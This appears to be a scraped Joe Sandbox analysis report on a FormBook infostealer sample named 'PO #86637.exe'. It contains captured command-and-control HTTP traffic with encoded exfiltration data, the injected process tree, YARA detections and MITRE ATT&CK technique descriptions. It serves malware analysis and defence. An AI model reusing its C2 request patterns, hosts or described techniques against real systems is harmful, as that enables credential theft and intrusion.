A8_pSPdX=wXJkDQSrfO98EvwBez7OvHngTKPhMCHJFSAsJzu+WkzAalTdxBnf0RfVXmFAeVnFA5pqtSav4/kKRDhGC1x0/zuPorKNpAL8d4Rb4QYB74/HaDjJW0h1htqLtNiSfS1wBlg7tm12CQ9citEaivyPpIinv4wjiPX9icl69ZaD4lTyPQNJhdclYdMd/5rvD9Ups6uF8wM+MtxjG0dq8R6qQez+VjJqYJJw/GfZmc+mrdTpNvWM62h9ylJ1hmJkRJdoelwjTxnZ/3tLN9DBD1kSyY2aQNHNQapVVppchO2JzAF+Cx6j16AoE4pXYXUEW+aDk2sAYWLMazGnzh2k5lV4KUfIrZ4ZlpSTjCJ8Z0CCOjQfHK/2Xs2xuL4JXOhHh0C4yKXK5PdS/39hjNnIt7QXajt2XUSQuSQCfJ68h1QN5pkgk+/g4iFL9VRzRW1bg4vKo7Tqwhc3ZLxe6185Bh8l18ydF0AiIYMA8XwB3SGlLrJ/3VoYv40GtxH2KsfaYLstDw+1YYMO4IBHapkhUML7WrWzwcsQAbM8zmkkgROvi0odk3uRtjJU7sI0xoti9mDF753ejh+ih1eARu216NkO5b1l47VVwLajg76iL85bUYGgGIp+4xF8yQSh0ZgcD048Ssj/3hGKLZSVESoiC/XE9r2n6dyiHbAlpe9bA+Odaj79fKhjaaoYub3tpC27aBVx0bpGKuJoQE37FRR6qrrrrGvT4Ax4kriDIp51ZYPObUptRUjSDrrX0SOpeQxVtGhfRCnxqxSVjUErnJ+Oc1ZADTri3dfA8Nb79emz09DxhLZPMhI8gO6IFEESF0k9EvDl6KGA/omoLCIwwlZBkNYdVOfBKZSSn91jK0bePwy/Ps8St3KfuKkGRmm+CBoeq+DzM7DvCeADptOpHgviaukDQVPKOsItiDWUdAKHj+VvGHiLLpy2JlxhBphJBdQ/Py2gEzJgtkIjmZFwDtjMMxrAIERzWqYR+mv/84SAVnmAWTK [TRUNCATED]
Sep 5, 2024 09:07:52.584880114 CEST	1762	OUT	Data Raw: 6d 53 42 56 4a 33 34 69 6f 46 75 56 6c 44 71 59 55 42 52 5a 6d 36 42 36 51 55 59 73 30 31 41 66 37 65 75 49 33 4e 2f 71 51 58 77 72 62 56 63 72 62 52 37 42 63 47 72 54 58 45 4a 4f 69 38 79 32 44 46 52 34 49 2b 65 75 6c 6d 45 70 30 4d 4a 78 56 31 Data Ascii: mSBVJ34ioFuVlDqYUBRZm6B6QUYs01Af7euI3N/qQXwrbVcrbR7BcGrTXEJOi8y2DFR4I+eulmEp0MJxV1jkeE7lFglNMS9facvjVCpAYDWMnc9VyrtYu40UV1b93AoBywbTXrmn19fPd5YNsX9x9vy5bjw+ushCaXkqze/3bBvH8G1ZJYP9d526Vlhaxl69BvjwHDx3zIPnzGPaPUIxHWVCOxv+bwStotax6XvH9DMzI5uOAVG
Sep 5, 2024 09:07:53.588018894 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:07:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Product: Z-BlogPHP 1.7.3 X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkbH0EwfZa1Wzt5EUGrMXmUao14gf2VrNKU0f6eMcptzuNq7RQNT%2Bz1is5N63RzERBCLC%2B1zHjQusycZsw2og8KC9pGgKhR%2BDlTf7MKFepY%2FDz9Ku%2FDaTcadHjDRx2du2wg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8be462881b3f17ed-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 61 35 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 [TRUNCATED] Data Ascii: a5csF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/I
Sep 5, 2024 09:07:53.588042021 CEST	1236	IN	Data Raw: f2 52 4e 24 4e 94 ae d8 d1 23 47 8f 44 14 9c 01 b2 0a 2d 2b 2a 50 62 70 bf 6a a8 9e e3 f1 0c b1 8e 4c 21 16 b1 0c a8 73 62 de 03 c7 22 12 ff 57 70 c6 a3 cb 9f d5 88 9c 0f c7 3a 88 1e f0 01 e2 e4 82 07 53 03 a4 92 24 f1 67 1b 22 b0 be 17 09 b1 08 Data Ascii: RN$N#GD-+PbpjL!sb"Wp:S$g"Ya&%q'U/B}MJ6)f^5aF0Y[4zpi'M=ziA+;x_F3+\X(CUMjYP)@]NDUI
Sep 5, 2024 09:07:53.588059902 CEST	883	IN	Data Raw: f3 57 77 ed a1 3d b0 5d dc 1a e7 4b 23 43 ce fa bc bb 3d c9 f2 6b 7c 38 3c ca b6 7e 2a ac e6 ec a9 ac b3 de ef ac df b0 17 6f ba 2b 93 3c ce de 26 f9 77 c2 be c7 0e f1 b6 c1 1c 1b 5e 72 86 e7 d9 fc 88 7d ab d7 ee 19 f6 53 f0 ce c6 35 7b 6c b1 b0 Data Ascii: Ww=]K#C=k\|8<~*o+<&w^r}S5{l:}g[M.q{mLk]kUk2P%}G+jZ}KbpYIu{n{yH;w8x]&N(R\|g,5A"q3NNd"\|jd^e]{

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.22	49200	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:55.118305922 CEST	556	OUT	GET /mquw/?A8_pSPdX=9VhEAk+nBcRFJItaXX6Ik3fcc5jQUDHEZy86ZzmkaEauDk+ByEDF1wffSRJdehvmJ40J6w+Nyel0VlcWIHUxviiTn/v8hhiufLl732sk/Kf2CDDROFQVvvK4n67B&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.chinaen.org Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:07:56.091516972 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:07:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Product: Z-BlogPHP 1.7.3 X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A9cc5mqBCL6nJnBkHV9HQg25w79ykswrd31JRgvuMLQ6wBRC7WCw0lhMr6IFoOiP5aU2OC5YGI2mC1zl6K4dxsc664QiwrWORQ%2FoFP4Emp4m%2FZk8aYQlcZY%2Bw%2FVjEKVQpkY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8be46297fff54249-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED] Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-
Sep 5, 2024 09:07:56.091550112 CEST	224	IN	Data Raw: 34 2e 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 4.3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.org
Sep 5, 2024 09:07:56.091564894 CEST	1236	IN	Data Raw: 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 31 2e 32 2e 34 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 Data Ascii: /zb_users/theme/yd1125free/style/style.min.css?v=1.2.4" /><script src="http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js" type="text/javascript"></script><script src="http://www.chinaen.org/zb_system/script/zblogphp.js" type="tex
Sep 5, 2024 09:07:56.091588974 CEST	1236	IN	Data Raw: 69 6e 61 65 6e 2e 6f 72 67 2f 73 65 61 72 63 68 2e 70 68 70 3f 61 63 74 3d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 71 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 e5 a4 Data Ascii: inaen.org/search.php?act=search"><input type="text" name="q" placeholder=""/><button type="submit" class="submit" value=""><i class="fa fa-search"></i></button></form></div><div class="mnav"><i cla
Sep 5, 2024 09:07:56.091603994 CEST	1236	IN	Data Raw: 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 6c 6f 6c 2f 32 30 34 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 Data Ascii: <li><a href="http://www.chinaen.org/lol/204.html" target="_blank" title="[]3.3? ">[]3.3? </a><span>1
Sep 5, 2024 09:07:56.091620922 CEST	1236	IN	Data Raw: e5 91 a8 e5 89 8d 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 35 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 Data Ascii: <span class="datetime"> (08-25)</span></span></li><li><a href="http://www.chinaen.org/lol/199.html" target="_blank" title="[JR]KSGAG ">[JR
Sep 5, 2024 09:07:56.091635942 CEST	1236	IN	Data Raw: 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 34 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 Data Ascii: ass="datetime"> (08-24)</span></span></li><li><a href="http://www.chinaen.org/lol/195.html" target="_blank" title=" ">
Sep 5, 2024 09:07:56.091651917 CEST	552	IN	Data Raw: 74 6f 6d 2e 6a 73 3f 76 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 Data Ascii: tom.js?v=1.2.4" type="text/javascript"></script><script>jQuery(document).ready(function($) {jQuery('.main_left').theiaStickySidebar({ additionalMarginTop: 10,});});</script><script>$.ias({ thresholdMargin: -100, triggerPageThreshold: 3
Sep 5, 2024 09:07:56.092539072 CEST	317	IN	Data Raw: 20 27 e6 9f a5 e7 9c 8b e6 9b b4 e5 a4 9a 27 2c 20 2f 2f e5 81 9c e6 ad a2 e8 bd bd e5 85 a5 e5 90 8e e6 98 be e7 a4 ba e7 9a 84 e5 86 85 e5 ae b9 20 2e 69 61 73 5f 74 72 69 67 67 65 72 20 e3 80 81 20 2e 69 61 73 5f 74 72 69 67 67 65 72 20 61 0d Data Ascii: '', // .ias_trigger .ias_trigger a onPageChange: function (pageNum, pageUrl, scrollOffset) { window._gaq && window._gaq.push(['_trackPageview', jQuery('<a/>').attr('href', pageUrl)[0].path

Statistics

Click to jump to process

Memory Usage

• PO #86637.exe
• svchost.exe
• fhSlYsGoxBSrK.exe
• netbtugc.exe
• fhSlYsGoxBSrK.exe
• firefox.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Behavior

• PO #86637.exe
• svchost.exe
• fhSlYsGoxBSrK.exe
• netbtugc.exe
• fhSlYsGoxBSrK.exe
• firefox.exe

Click to jump to process

Target ID:	0
Start time:	03:04:43
Start date:	05/09/2024
Path:	C:\Users\user\Desktop\PO #86637.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO #86637.exe"
Imagebase:	0x1190000
File size:	1'190'400 bytes
MD5 hash:	D14AC19303AC82DD9370E6E3277EF1C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:04:44
Start date:	05/09/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO #86637.exe"
Imagebase:	0xa00000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:04:55
Start date:	05/09/2024
Path:	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe"
Imagebase:	0x360000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:04:59
Start date:	05/09/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xf10000
File size:	26'624 bytes
MD5 hash:	895962CB2049447EFD2DBE61DEDE596A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:05:10
Start date:	05/09/2024
Path:	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe"
Imagebase:	0x360000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:05:37
Start date:	05/09/2024
Path:	C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Imagebase:	0x220000
File size:	517'064 bytes
MD5 hash:	C2D924CE9EA2EE3E7B7E6A7C476619CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO #86637.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

